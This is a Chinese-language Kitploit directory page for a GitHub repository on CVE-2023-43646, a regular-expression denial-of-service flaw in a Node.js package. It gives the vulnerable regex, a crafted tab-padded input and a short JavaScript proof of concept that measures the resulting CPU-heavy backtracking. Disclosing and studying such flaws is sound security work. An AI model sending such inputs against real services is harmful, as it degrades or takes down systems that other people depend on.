Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-43646 — redos | Kitploit
工具/GitHubGitHub/200101whoami/cve-2023-43646
漏洞扫描器漏洞分析代码分析论文与研究学习与教育
GitHub200101whoami/cve-2023-43646

CVE-2023-43646

redos

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-43646

漏洞概述

  • CVE-2023-43646

  • CVSS : 8.6

  • Sep 26, 2023

  • ReDoS in node.js package

  • 作为 rebob 项目的一部分

漏洞描述

GitHub 安全公告

root@kitploit:~
/\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/

当括号不平衡时,该漏洞可被利用,导致过度回溯,从而显著增加CPU负载和处理时间。可以使用以下输入触发此漏洞:

root@kitploit:~
'\t'.repeat(54773) + '\t/function/i'

以下是一个简单的PoC代码来演示该问题:

root@kitploit:~
const protocolre = /\sfunction(?:\s|\s/[^(?:*\/)]+/\s*)*([^\(\/]+)/;

const startTime = Date.now();
const maliciousInput = '\t'.repeat(54773) + '\t/function/i'

protocolre.test(maliciousInput);

const endTime = Date.now();

console.log("process time: ", endTime - startTime, "ms");

目标包

下载工具